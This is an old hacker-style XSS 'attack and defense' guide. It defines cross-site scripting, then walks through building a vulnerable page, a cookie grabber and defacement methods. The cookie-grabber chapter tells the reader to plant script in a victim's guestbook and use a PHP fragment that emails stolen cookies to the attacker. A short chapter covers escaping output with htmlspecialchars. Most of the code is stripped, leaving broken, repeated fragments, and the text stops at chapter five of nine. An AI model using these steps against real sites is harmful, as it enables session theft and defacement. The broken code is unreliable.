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| Cross Site Scripting - Attack and Defense guide / /
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By Xylitol 10-02-08 /___/
Author: Xylitol
Description: a simple guide on XSS methods.
Homepage: http://xylitol.free.fr
Contact: Xylitol[at]fbi[dot]gov
Date: 10/02/08
1> What is XSS ?
2> Code a XSS vulnerability
3> Make a cookie grabber
4> Securing XSS
5> Deface Methods
6> Filteration Bypassing
7> Flash attak
8> XSS upload
9> phishing XSS
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| / /.: Chapter 1 - What is XSS ? :.\ \ |
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/ / (From Wikipedia, the free encyclopedia) \ \
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Cross-zone scripting is a browser exploit taking
advantage of a vulnerability within a zone-based security solution.
The attack allows content (scripts) in unprivileged zones
to be executed with the permissions of a privileged zone - i.e.
a privilege escalation within the client (web browser) executing the script.
The vulnerability could be:
* a web browser bug which under some conditions allows content (scripts)
in one zone to be executed with the permissions of a higher privileged zone.
* a web browser configuration error; unsafe sites listed in privileged zones.
* a cross-site scripting vulnerability within a privileged zone
A common attack scenario involves two steps.
The first step is to use a Cross Zone Scripting vulnerability
to get scripts executed within a privileged zone. To complete the attack,
then perform malicious actions on the computer using insecure ActiveX components.
This type of vulnerability has been exploited to silently install
various malware (such as spyware, remote control software, worms and such)
onto computers browsing a malicious web page.
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| / /.:Chapter 2 - Code a XSS vulnerability :.\ \ |
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Open notepad and copy/past this script:
Simple XSS vulnerability by Xylitol
after, save this page: index.html
open a new notpad and Copy/past that:
Search result:
Search result :
save this page in: XSS.php
close notepad
open index.html in firefox
enter a value and search
return on the page of research and enter
send the form
bingo a dialogue box !
/ dit: X \
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XSS Vulnerability is here...
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| / /.: Chapter 3 - Make a cookie grabbers :.\ \ |
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insert this script in a vulnerable page (for exemple a guestbook)
(www.Hax0r.com = your site)
Open notepad and make a page: cookie.php
copy/past this code:
mail('email@example.com', 'Cookie stealed ! - thx xyli :)', $cookies); ?>
Error - Access denied for echo $_SERVER["REMOTE_ADDR"]; ?>
It is not enough any more but for the pirate,
than to await the reception of the email and to read the cookie there.
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| / /.: Chapter 4 - Securing XSS :.\ \ |
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FIX it:
for fix XSS Vulnerability use htmlentities:
in line 16 Remplace:
Search result :
Search result :
use htmlspecialchars() function in PHP ;)
other function:
htmlentities() quotes
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| / /.: Chapter 5 -deface Methods :.\ \ |
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defacer with a XSS and a rather simple thing
here are the principal ones…
defacement by an image:
or a video flash: